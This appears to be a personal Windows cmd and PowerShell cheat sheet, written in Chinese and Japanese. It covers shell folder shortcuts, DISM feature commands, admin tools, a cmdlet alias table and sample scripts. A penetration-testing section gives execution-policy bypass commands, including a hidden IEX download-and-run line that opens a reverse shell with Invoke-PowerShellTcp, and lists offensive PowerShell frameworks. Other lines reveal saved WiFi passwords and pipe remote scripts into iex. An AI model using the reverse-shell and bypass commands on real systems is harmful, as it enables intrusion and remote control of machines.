cmd命令

shell:start menu    用户的开始菜单
shell:common start menu　通用的

shell:startup       启动文件夹,用户登录时会自动运行这个文件夹中的程序
shell:common startup　通用的

shell:programs   "开始"菜单中的程序文件夹
shell:common programs　通用的

shell:desktop     用户的桌面文件夹
shell:common desktop　通用的

shell:appdata      应用程序数据文件夹,存储应用程序的配置文件等
shell:common appdata　通用的

shell:appsfolder   应用程序文件夹
shell:sendto       "发送到"菜单中的文件夹
shell:recent         最近使用的文件列表
shell:fonts           字体文件夹
shell:RecycleBinFolder  回收站

shell:UsersFilesFolder  用户根目录

shell:favorites     收藏夹文件夹
shell:Libraries       公用库 （图片照片文档视频等）
shell:UsersLibrariesFolder  用户的库（图片照片文档视频等）
shell:my music    用户的音乐文件夹
shell:my pictures 用户的图片文件夹
shell:my videos    用户的视频文件夹
shell:templates    模板文件夹


shell:ProgramFiles  用户的Program Files
shell:ProgramFilesCommon   通用的Program Files

shell:ProgramFilesX86   用户的Program Files(x86)
shell:ProgramFilesCommonX86   通用的Program Files(x86)

Window附加功能

機能の確認      dism /online /Get-Features
機能の有効化  dism /online /Enable-Feature:役割名
機能の無効化  dism /online /Disable-Feature:役割名

＜Hyper-V＞ 
dism /online /enable-feature /featurename:Microsoft-Hyper-V/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-All/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-Hypervisor/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-Services/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-Tools-All/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-Management-Clients/all /norestart
dism /online /enable-feature /featurename:Microsoft-Hyper-V-Management-PowerShell/all /norestart

＜WSL＞
dism /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

＜虚拟机Platform＞
dism /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart

表示名	機能名
.NET Framework 3.5 (.NET 2.0 および 3.0 を含む)	NetFx3
.NET Framework 4.8 Advanced Services	NetFx4-AdvSrvs
--	--
Hyper-V	Microsoft-Hyper-V
Hyper-V プラットフォーム	Microsoft-Hyper-V-All
Hyper-V Hypervisor	Microsoft-Hyper-V-Hypervisor
Hyper-V サービス	Microsoft-Hyper-V-Services
Hyper-V 管理ツール	Microsoft-Hyper-V-Tools-All
Hyper-V GUI 管理ツール	Microsoft-Hyper-V-Management-Clients
Windows PowerShell 用 Hyper-V モジュール	Microsoft-Hyper-V-Management-PowerShell
--	--
Linux 用 Windows サブシステム	Microsoft-Windows-Subsystem-Linux
--	--
仮想マシン プラットフォーム	VirtualMachinePlatform

各种面板

http://wingsan.web.fc2.com/WinCom/index.html

winver　　windows版本
lusrmgr.msc　　用户和组
netplwiz　　用户账号管理
compmgmt.msc　　电脑管理
devmgmt.msc　　硬件管理
diskmgmt.msc　　磁盘管理
dxdiag　　DirectX診断
regedit　　注册表
firewall.cpl　　防火墙
control　　控制面板
services.msc　　服务进程
taskmgr　　任务管理
appwiz.cpl　　软件一览
ComputerDefaults　　window默认程序
OptionalFeatures　　window附加功能★
sysdm.cpl　　环境变量★
fsmgmt.msc　　共享文件夹
mstsc　　远程桌面
fonts　　字体

查看内网IP

ipconfig

查看公网IP

curl ipinfo.io

网络诊断

tracert www.google.com

WIFI密码

netsh wlan show profiles                         　←查看名字
netsh wlan show profiles name=xxxx key=clear        ←名字代入

强制启动旧版IE6.0浏览器

CreateObject("InternetExplorer.Application").Visible=true
保存为vbs

修复系统文件

sfc /scannow

恢复应用商店

wsreset -i

切换成Win10的右键菜单

reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve

切换成Win11的右键菜单（不推荐）

reg delete "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}" /f 

永久暂停Windows自动更新

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v FlightSettingsMaxPauseDays /t reg_dword /d 9999 /f

Windows家庭版，强制开启hyper-v

pushd "%~dp0"
dir /b %SystemRoot%servicingPackages*Hyper-V*.mum >hv.txt
for /f %%i in ('findstr /i . hv.txt 2^>nul') do dism /online /norestart /add-package:"%SystemRoot%servicingPackages%%i"
del hv.txt
Dism /online /enable-feature /featurename:Microsoft-Hyper-V -All /LimitAccess /ALL
pause

将文本文档改名为"xxx.bat"，需注意.bat是扩展名
运行完成后，重启电脑

Powershell命令

Powershell的基本概念

ps1文件

一个PowerShell脚本其实就是一个简单的文本文件， 这个文件包含了一系列PowerShell命令，每个命令显示为独立的一行，文件名需要加上.ps1的扩展名。

运行脚本

运行PowerShell脚本，必须键入完整的路径和文件名，例如，你要运行一个名为a.ps1的脚本，可以键入C:\Scripts\a.ps1

获取 PowerShell Command一覧

PS>  gcm　或者   PS>  get-command

Powershell的常用命令

在PowerShell下，类似“cmd命令"叫作"cmdlet" ，其命名规范相当一致，都采用"动词-名词”的形式，如New-ltem，动词部分般为Add、 New、Get、Remove、Set等， 命名的别名一般兼容Windows Command和Linux Shell,如Get-Childltem命令使用dir或|s均可，而且PowerShell命令不区分大小写

下面以文件操作为例讲解PowerShell命令的基本用法

• 新建目录: New-Item -Path 'E:\Test Folder' -ItemType Directory
• 新建文件: New-Item -Path new.txt -ItemType File
• 删除目录: Remove-Item 'E:\Test Folder'
• 显示文本内容: Get-Content new.txt
• 置文本内容: Set-Content new.txt -Value "hello, word! "
• 追加内容: Add-Content new.txt -Value "i love you"
• 清除内容: Clear-Content new.txt

管道

管道的作用是将一个命令的输出作为另一个命令的输入， 两个命令之间用管道符号| 连接。
举一个例子、停止所有目前运行中的，以"p"字符开头命名的程序，命令如下所示。

PS> get-process p* | stop-process

Powershell进阶篇

执行策略

为防止恶意脚本的执行，PowerShell的执行策略，默认情况下，Restricted:脚本不能运行，可以通过以下命令查看当前的执行策略。

• Get-ExecutionPolicy：

  • Restricted:脚本不能运行(默认设置)。
  • RemoteSigned:本地创建的脚本可以运行，但从网上下载的脚本不能运行(拥有数字证书签名的除外)。
  • AllSigned:仅当脚本由受信任的发布者签名时才能运行。
  • Unrestricted: 允许所有的script运行。

• Set-ExecutionPolicy
  可以通过上面命令改变PowerShell的执行策略。

如果要运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本， 比如下面这三种。

1. 绕过本地权限执行
   上传xx.ps1至目标服务器，在CMD环境下，在目标服务器本地执行该脚本，如下所示。

PowerShell.exe -ExecutionPolicy Bypass -File xx.ps1

2. 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile File xx.ps1

3. 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonI -NoProfile iex (New-Object Net.WebClient).DownloadString("xxx.ps1");Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

上述参数的说明，如下

• ExecutionPolicy Bypass绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数，可以绕过任意一个安全保护规则
• WindowStyle Hidden　隐藏窗口
• NoLogo　启动不显示版权标志的PowerShell.
• NonInteractive (-Nonl) 　非交互模式，PowerShell不为用户提供交互的提示。
• NoProfile (-NoP) 　PowerShell控制台不加载当前用户的配置文件。
• Noexit　执行后不退出Shell。这在使用键盘记录脚本时非常重要。

常用的PowerShel攻击工具有以下这几种

• PowerSplit　这是众多PowerShell攻击工具中被广泛使用的PowerShel后期漏洞利用框架，常用于信息探测、特权提升、凭证窃取、持久化等操作。

• Nishang　基于PowerShell的渗透测试专用工具， 集成了框架、脚本和各种Payload,包含下载和执行、键盘记录、DNS、 延时命令等脚本。

• Empire　基于PowerShel的远程控制木马，可以从凭证数据库中导出和跟踪凭证信息，常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。

• PowerCat　Powershell版的NetCat, 有着网络工具中的"瑞士军刀”美誉，它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向，可以在脚本中以多种方式使用它。

获取 PowerShell Alias一覧

PS>  gal　或者   PS>  Get-Alias

PowerShell Alias一覧

PowerShell Alias	PowerShell Command	例子
命令	Command	⇣⇣⇣⇣⇣
gcm 👙	Get-Command	例：Get-Command Get-*　查找所有以 Get- 开头的 cmdlets
icm	Invoke-Command
shcm	Show-Command
trcm	Trace-Command
别名	Alias	⇣⇣⇣⇣⇣
gal 👙	Get-Alias	显示PowerShell Alias一覧
nal	New-Alias
sal	Set-Alias
ipal	Import-Alias
epal	Export-Alias
磁盘	PSDrive	⇣⇣⇣⇣⇣
gdr 👙	Get-PSDrive
mount 👙	New-PSDrive
ndr	New-PSDrive
rdr	Remove-PSDrive
目录	Location	⇣⇣⇣⇣⇣
pwd 👙	Get-Location	显示当前所在目录
gl	Get-Location	同上
cd 👙	Set-Location	例：Set-Location C:\Users\YourName\Documents 切换文档目录
chdir	Set-Location	同上
sl	Set-Location	同上
popd	Pop-Location	？
pushd	Push-Location	？
子目录或文件	ChildItem	⇣⇣⇣⇣⇣
ls 👙	Get-ChildItem	列出当前目录下的所有文件和目录
dir 👙	Get-ChildItem	同上
gci	Get-ChildItem	同上
操作目录或文件	Item	⇣⇣⇣⇣⇣
copy 👙	Copy-Item	例：Copy-Item C:\source\test.txt C:\destination\ 复制文件 test.txt 到另一个目录
cp 👙	Copy-Item	同上
cpi	Copy-Item	同上
mv 👙	Move-Item	例：Move-Item C:\temp\oldname.txt C:\temp\newfolder\newname.txt 将文件 oldname.txt 移动到 newfolder 并重命名为 newname.txt
move	Move-Item	同上
mi	Move-Item	同上
ren 👙	Rename-Item	例：Rename-Item C:\temp\oldname.txt C:\temp\newname.txt 将文件 oldname.txt 重命名为 newname.txt
rni	Rename-Item	同上
del 👙	Remove-Item	例：Remove-Item C:\temp\test.txt -Force 删除名为 test.txt 的文件
rm 👙	Remove-Item	同上
rmdir 👙	Remove-Item	同上
erase	Remove-Item	同上
rd	Remove-Item	同上
ri	Remove-Item	同上
ni	New-Item	例：New-Item -ItemType Directory -Path .\myFolder 在当前目录下创建一个名为 myFolder 的新目录
gi	Get-Item	？
si	Set-Item	？
ii	Invoke-Item	？
cli	Clear-Item	？
md 👙	mkdir	创建文件夹
操作目录或文件属性	ItemProperty	⇣⇣⇣⇣⇣
gp	Get-ItemProperty
sp	Set-ItemProperty
clp	Clear-ItemProperty
rnp	Rename-ItemProperty
rp	Remove-ItemProperty
cpp	Copy-ItemProperty
mp	Move-ItemProperty
gpv	Get-ItemPropertyValue
变量	Variable	⇣⇣⇣⇣⇣
set	Set-Variable
sv	Set-Variable
gv	Get-Variable
nv	New-Variable
clv	Clear-Variable
rv	Remove-Variable
对象	Object	⇣⇣⇣⇣⇣
%	ForEach-Object
foreach	ForEach-Object
?	Where-Object
where	Where-Object	例：Get-Process | Where-Object { $_.CPU -gt 10 } 获取 CPU 占用率大于 10% 的所有进程
group	Group-Object	例：Get-Process | Group-Object -Property MainModule.FileName 按主模块的文件名分组进程
sort	Sort-Object	例：Get-Process | Sort-Object -Property CPU -Desc 按 CPU 占用率降序排列所有进程
measure	Measure-Object
select	Select-Object
tee	Tee-Object
gwmi 👙	Get-WmiObject	例：Get-WmiObject -Class Win32_OperatingSystem 获取操作系统信息
rwmi	Remove-WmiObject
模型	Module	⇣⇣⇣⇣⇣
gmo	Get-Module
ipmo	Import-Module
nmo	New-Module
rmo	Remove-Module
比較	Compare	⇣⇣⇣⇣⇣
diff 👙	Compare-Object	例：$list1 = 1..5 $list2 = 2..6 Compare-Object -ReferenceObject $list1 -DifferenceObject $list2 比较两个数字列表的不同之处
compare 👙	Compare-Object	同上
屏幕	Host	⇣⇣⇣⇣⇣
write 👙	Write-Output	例：Write-Host "Hello, world!" 输出 Hello, world!
echo 👙	Write-Output	同上
clear 👙	Clear-Host	清除控制台屏幕
cls 👙	Clear-Host	同上
屏幕记录	History	⇣⇣⇣⇣⇣
clhy	Clear-History
ghy	Get-History
h	Get-History
history	Get-History
ihy	Invoke-History
r	Invoke-History
进程	Process	⇣⇣⇣⇣⇣
ps 👙	Get-Process	获取所有运行中的进程　`ps
gps	Get-Process	同上
start	Start-Process	例：Start-Process notepad 启动记事本应用程序
saps	Start-Process	同上
kill	Stop-Process	例：Stop-Process -Name notepad 终止所有名为 notepad 的进程
spps	Stop-Process	同上
服务	Service	⇣⇣⇣⇣⇣
gsv 👙	Get-Service	获取所有服务的状态
sasv	Start-Service	例：Start-Service -Name spooler 启动 Print Spooler 服务
spsv	Stop-Service	例：Stop-Service -Name spooler 停止 Print Spooler 服务
ー	Restart-Service	例：Restart-Service -Name spooler 重启 Print Spooler 服务
任務	Job	⇣⇣⇣⇣⇣
gjb 👙	Get-Job
sajb	Start-Job
spjb	Stop-Job
wjb	Wait-Job
rjb	Remove-Job
rcjb	Receive-Job
rujb	Resume-Job
sujb	Suspend-Job
文件操作	Content	⇣⇣⇣⇣⇣
cat 👙	Get-Content	例：$content = Get-Content -Path "C:\temp\input.txt" 读取文件内容
type 👙	Get-Content	同上
gc	Get-Content	同上
sc	Set-Content	例："Hello, world!" | Set-Content -Path "C:\temp\output.txt" 写入文件内容
ac	Add-Content	例："Another line" | Add-Content -Path "C:\temp\output.txt" 添加文件内容
clc	Clear-Content
CSV操作	CSV	⇣⇣⇣⇣⇣
ipcsv	Import-Csv	例：$data = Import-Csv -Path "C:\temp\data.csv" 从 CSV 文件导入数据
epcsv	Export-Csv	例：$data | Export-Csv -Path "C:\temp\output.csv" -NoTypeInformatio 将数据导出为 CSV 文件
网络请求	WebRequest	⇣⇣⇣⇣⇣
wget 👙	Invoke-WebRequest	例：Invoke-WebRequest "https://api.github.com/repos/powershell/powershell/releases/latest" 获取 GitHub 上最新发布的版本信息
curl 👙	Invoke-WebRequest	https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
irm👙	Invoke-RestMethod　XMLやJSON扱いやすい	https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.4
iex 👙	Invoke-Expression	https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.4
iwr	Invoke-WebRequest	同上
剪贴板	Clipboard	⇣⇣⇣⇣⇣
gcb	Get-Clipboard
scb	Set-Clipboard
时间地域	TimeZone	⇣⇣⇣⇣⇣
gtz	Get-TimeZone
stz	Set-TimeZone
Session	PSSession	⇣⇣⇣⇣⇣
cnsn	Connect-PSSession
dnsn	Disconnect-PSSession
epsn	Export-PSSession
etsn	Enter-PSSession
exsn	Exit-PSSession
gsn	Get-PSSession
ipsn	Import-PSSession
rcsn	Receive-PSSession
rsn	Remove-PSSession
nsn	New-PSSession
npssc	New-PSSessionConfigur
Breakpoint	PSBreakpoint	⇣⇣⇣⇣⇣
dbp	Disable-PSBreakpoint
ebp	Enable-PSBreakpoint
gbp	Get-PSBreakpoint
sbp	Set-PSBreakpoint
rbp	Remove-PSBreakpoint
Snapin	PSSnapin	⇣⇣⇣⇣⇣
gsnp	Get-PSSnapin
asnp	Add-PSSnapin
rsnp	Remove-PSSnapin
その他	Others	⇣⇣⇣⇣⇣
man 👙	help	例：Get-Help Get-Process 获取 Get-Process 的帮助文档
ise	powershell_ise.exe
CFS	ConvertFrom-String
cvpa	Convert-Path
fc	Format-Custom
fhx	Format-Hex
fl	Format-List
ft	Format-Table
fw	Format-Wide
gcs	Get-PSCallStack
gin 👙	Get-ComputerInfo
gm	Get-Member
gu	Get-Unique
iwmi	Invoke-WmiMethod
lp	Out-Printer
ogv	Out-GridView
oh	Out-Host
rvpa	Resolve-Path
sleep	Start-Sleep
sls	Select-String	例：Select-String -Path "C:\temp\log.txt" -Pattern "error" 在日志文件中搜索含有 "error" 的行
swmi	Set-WmiInstance	在 WMI 中创建或修改实例

Invoke-RestMethod与 Invoke-WebRequest的区别

$rest = Invoke-RestMethod "https://yesno.wtf/api"
$web = Invoke-WebRequest "https://yesno.wtf/api"

$rest
answer forced image
------ ------ -----
yes     False https://yesno.wtf/assets/yes/2-5df1b403f2654fa77559af1bf2332d7a.gif

$rest.answer
yes

$web
StatusCode        : 200
StatusDescription : OK
Content           : {"answer":"yes","forced":false,"image":"https://yesno.wtf/assets/yes/1-af11222d8d4af90bdab8fc447c8cfe
                    bf.gif"}
RawContent        : HTTP/1.1 200 OK
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Status: 200 OK
                    Cache-Control: must-revalidate, max-age=0, private
                    Access-Control-Allow-Origin: *
                    ETag: "d5d1109b6aaeee4be8ce60e5846156…
Headers           : {[Transfer-Encoding, System.String[]], [Connection, System.String[]], [Status, System.String[]], [Cac
                    he-Control, System.String[]]…}
Images            : {}
InputFields       : {}
Links             : {}
RawContentLength  : 109
RelationLink      : {}

$hoge = ConvertFrom-Json $web
$hoge.answer
yes

前者（RestMethod）は PowerShell 特有の PSObject という形ですね。
後者（WebRequest）はこのコマンドレット特有のものですね。

RestMethod のほうが XML や JSON を扱いやすい

単純に手間が一つ少ないというだけではありますが、Json を扱うなら RestMethod が良さそうですね。
また、構造としてはどちらも同じらしく、出力のデータ形式が異なる以外の相違点はないそうです。

删除Windows内置app win11debloat

irm "https://win11debloat.raphi.re/" | iex

修改Win设置 ChrisTitusTech/winutil

irm "https://christitus.com/win" | iex

PowerShellでWMIクラスの一覧を取得

Get-WmiObject -list | Sort-Object

WMIオブジェクトを検索することができます

Get-WmiObject -list | Select-String キーワード
例：Get-WmiObject -list | Select-String Win32_Disk
　　Get-WmiObject -list | Select-String Win32_System
　　Get-WmiObject -list | Select-String Win32_Oper

---

示例：获取本地PC的信息（保存为getPCInfo.ps1）

function global:getPCInfo ($pcname) {
    if ($pcname -eq $null) {
        $pcname = 'localhost'
    }

    $ErrorActionPreference = "silentlycontinue"
    $outputString = ""

    if (Test-Connection $pcname -count 1) {
        $outputString += "====================================================`n"
        $outputString += $pcname + "`n"
        $outputString += "--------------------------`n"
        
        $ComputerSystem = Get-WmiObject Win32_ComputerSystem -computername $pcname

        # ComputerName
        $outputString += ("ComputerName   : " + $ComputerSystem.Name + "`n")

        # IPAddress
        $IPAddressArray = (Get-WmiObject Win32_NetworkAdapterConfiguration -computername $pcname).IPAddress
        $IPAddress = ""
        foreach ($ip in $IPAddressArray) {
            if ($ip -ne $null){
                $IPAddress = $ip
            }
        }
        $outputString += ("IPAddress      : " + $IPAddress + "`n")
        
        # Model
        $outputString += ("Model          : " + $ComputerSystem.Model + "`n")

        # BaseBoard
        $BaseBoard = Get-WmiObject Win32_BaseBoard -computername $pcname
        $outputString += ("MotherBoard    : " + $BaseBoard.Manufacturer + " " + $BaseBoard.Product + "`n")

        # OS
        $OS = Get-WmiObject Win32_OperatingSystem -computername $pcname
        $outputString += ("OS             : " + $OS.Caption + "`n")

        # CPU
        $Processor = Get-WmiObject Win32_Processor -computername $pcname
        if ($Processor.GetType().Name -eq "Object[]"){
            $Processor = $Processor[0]
        }
        $outputString += ("CPU            : " + $Processor.Name + "`n")
        
        # RAM
        $Capacitys = (Get-WmiObject Win32_PhysicalMemory -computername $pcname).Capacity
        for ($i = 0; $i -lt $Capacitys.length; $i++) {
            $Capacitys[$i] = [string][int]($Capacitys[$i]/1GB)
        }
        $TotalPhysicalMemory = [int]($ComputerSystem.TotalPhysicalMemory/1GB)
        $outputString += ("RAM            : " + $TotalPhysicalMemory + " GB [" + ($Capacitys -join "/") + "]`n")
        
        # VideoController
        $VideoController = Get-WmiObject Win32_VideoController -computername $pcname
        
        if ($VideoController.GetType().Name -ne "Object[]"){
            $VideoController = @($VideoController)
        }
        
        $outputString += ("VideoController:`n")
        for ($i = 0; $i -lt $VideoController.length; $i++) {
            $outputString += ("    " + $VideoController[$i].Name + "  [" + $VideoController[$i].CurrentHorizontalResolution + " x " + $VideoController[$i].CurrentVerticalResolution + "]`n")
        }
        
        # NetworkAdapter
        $NetworkAdapterNames = (Get-WmiObject Win32_NetworkAdapter -Filter "NetConnectionStatus = 2" -computername $pcname).Name
        if ($NetworkAdapterNames.GetType().Name -ne "Object[]"){
            $NetworkAdapterNames = @($NetworkAdapterNames)
        }
        $outputString += "NetworkAdapter :`n"
        foreach ($n in $NetworkAdapterNames) {
            $outputString += ("    " + $n + "`n")
        }
        
        # LogicalDisk
        $LocalDisk = Get-WmiObject Win32_LogicalDisk -Filter "DriveType = 3" -computername $pcname
        
        if ($LocalDisk.GetType().Name -ne "Object[]"){
            $LocalDisk = @($LocalDisk)
        }

        $outputString += "LocalDisk      :`n"
        $disks = $LocalDisk
        for ($i = 0; $i -lt $LocalDisk.length; $i++) {
            $outputString += ("    " + $LocalDisk[$i].DeviceID + " " + [int]($LocalDisk[$i].Size/1GB) + " GB [FreeSpace:" + [int]($LocalDisk[$i].FreeSpace/1GB) + " GB]`n")
            $disks[$i] = ($LocalDisk[$i].DeviceID + " " + [int]($LocalDisk[$i].Size/1GB) + " GB [Free:" + [int]($LocalDisk[$i].FreeSpace/1GB) + " GB]")
        }
    } else {
        $outputString += "====================================================`n"
        $outputString += ($pcname + " not responding...`n")
    }
    
    echo $outputString
    $ErrorActionPreference = "continue"
}

调用：

$ .\getPCInfo.ps1

// localhost
$ getPCInfo

// network
$ getPCInfo <computername>

结果：

====================================================
localhost
--------------------------
ComputerName   : COMPUTERNAME
IPAddress      : XXX.XXX.XXX.XXX
Model          : B460M
MotherBoard    : MouseComputer B460M
OS             : Microsoft Windows 11 Home
CPU            : Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
RAM            : 16 GB [8/8]
VideoController:
    NVIDIA GeForce RTX 3060  [1920 x 1200]
NetworkAdapter :
    Intel(R) Ethernet Connection (12) I219-V
LocalDisk      :
    C: 476 GB [FreeSpace:88 GB]
    D: 1863 GB [FreeSpace:1151 GB]

Powershell 控制鼠标移动

# .NET Frameworkの宣言
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") 
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") 

# Windows APIの宣言
$signature=@'
[DllImport("user32.dll",CharSet=CharSet.Auto,CallingConvention=CallingConvention.StdCall)]
public static extern void mouse_event(long dwFlags, long dx, long dy, long cButtons, long dwExtraInfo);
'@
$SendMouseClick = Add-Type -memberDefinition $signature -name "Win32MouseEventNew" -namespace Win32Functions -passThru

while ($true) {

    # マウスカーソル移動
    [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(627, 379)
    # 左クリック
    $SendMouseClick::mouse_event(0x0002, 0, 0, 0, 0);
    $SendMouseClick::mouse_event(0x0004, 0, 0, 0, 0);
    Start-Sleep -s 3

    # マウスカーソル移動
    [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(859, 194)
    # 左クリック
    $SendMouseClick::mouse_event(0x0002, 0, 0, 0, 0);
    $SendMouseClick::mouse_event(0x0004, 0, 0, 0, 0);
    Start-Sleep -s 3
}

Windows特殊文件夹

• System.Environmentを使って特殊フォルダ一覧リストを出力

[Environment+SpecialFolder]::GetNames([Environment+SpecialFolder]) | Sort-Object

↓↓特殊フォルダの一覧
AdminTools
ApplicationData
CDBurning
CommonAdminTools
CommonApplicationData
CommonDesktopDirectory
CommonDocuments
CommonMusic
CommonOemLinks
CommonPictures
CommonProgramFiles
CommonProgramFilesX86
CommonPrograms
CommonStartMenu
CommonStartup
CommonTemplates
CommonVideos
Cookies
Desktop
DesktopDirectory
Favorites
Fonts
History
InternetCache
LocalApplicationData
LocalizedResources
MyComputer
MyDocuments
MyMusic
MyPictures
MyVideos
NetworkShortcuts
Personal
PrinterShortcuts
ProgramFiles
ProgramFilesX86
Programs
Recent
Resources
SendTo
StartMenu
Startup
System
SystemX86
Templates
UserProfile
Windows

• 各特殊フォルダのパスの取得方法は、Enviroment.GetFolderPath() メソッドを使用

[Environment]::GetFolderPath("Desktop")
> C:\Users\xyz\Desktop

[Environment]::GetFolderPath("AdminTools")
> C:\Users\xyz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools

[Environment]::GetFolderPath("ProgramFiles")
> C:\Program Files (x86)

• 特殊フォルダのパス一覧を出力

$SpecialFolders = @{}
$names = [Environment+SpecialFolder]::GetNames([Environment+SpecialFolder]) | Sort-Object
$names | Format-Table

foreach($name in $names)
{
  if($path = [Environment]::GetFolderPath($name)){
    $SpecialFolders[$name] = $path
  }
}
$SpecialFolders | Format-Table

# ↓↓パス一覧
Name                           Value
----                           -----
System                         C:\WINDOWS\system32
CommonApplicationData          C:\ProgramData
CommonVideos                   C:\Users\Public\Videos
CDBurning                      C:\Users\win11\AppData\Local\Microsoft\Windows\Burn\Burn
MyVideos                       C:\Users\win11\Videos
ProgramFilesX86                C:\Program Files (x86)
AdminTools                     C:\Users\win11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
History                        C:\Users\win11\AppData\Local\Microsoft\Windows\History
CommonDocuments                C:\Users\Public\Documents
Templates                      C:\Users\win11\AppData\Roaming\Microsoft\Windows\Templates
CommonDesktopDirectory         C:\Users\Public\Desktop
UserProfile                    C:\Users\win11
Startup                        C:\Users\win11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
InternetCache                  C:\Users\win11\AppData\Local\Microsoft\Windows\INetCache
SystemX86                      C:\WINDOWS\SysWOW64
CommonStartMenu                C:\ProgramData\Microsoft\Windows\Start Menu
MyPictures                     C:\Users\win11\Pictures
Recent                         C:\Users\win11\AppData\Roaming\Microsoft\Windows\Recent
Fonts                          C:\WINDOWS\Fonts
SendTo                         C:\Users\win11\AppData\Roaming\Microsoft\Windows\SendTo
CommonProgramFiles             C:\Program Files\Common Files
ProgramFiles                   C:\Program Files
Favorites                      C:\Users\win11\Favorites
CommonStartup                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Windows                        C:\WINDOWS
DesktopDirectory               C:\Users\win11\Desktop
LocalizedResources             C:\WINDOWS
MyMusic                        C:\Users\win11\Music
ApplicationData                C:\Users\win11\AppData\Roaming
CommonPictures                 C:\Users\Public\Pictures
CommonPrograms                 C:\ProgramData\Microsoft\Windows\Start Menu\Programs
Desktop                        C:\Users\win11\Desktop
PrinterShortcuts               C:\Users\win11\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
CommonAdminTools               C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools
NetworkShortcuts               C:\Users\win11\AppData\Roaming\Microsoft\Windows\Network Shortcuts
CommonMusic                    C:\Users\Public\Music
CommonProgramFilesX86          C:\Program Files (x86)\Common Files
Programs                       C:\Users\win11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
Resources                      C:\WINDOWS\resources
MyComputer                     C:\WINDOWS
CommonTemplates                C:\ProgramData\Microsoft\Windows\Templates
CommonOemLinks                 C:\WINDOWS
MyDocuments                    C:\Users\win11\Documents
StartMenu                      C:\Users\win11\AppData\Roaming\Microsoft\Windows\Start Menu
Cookies                        C:\Users\win11\AppData\Local\Microsoft\Windows\INetCookies
LocalApplicationData           C:\Users\win11\AppData\Local
Personal                       C:\Users\win11\Documents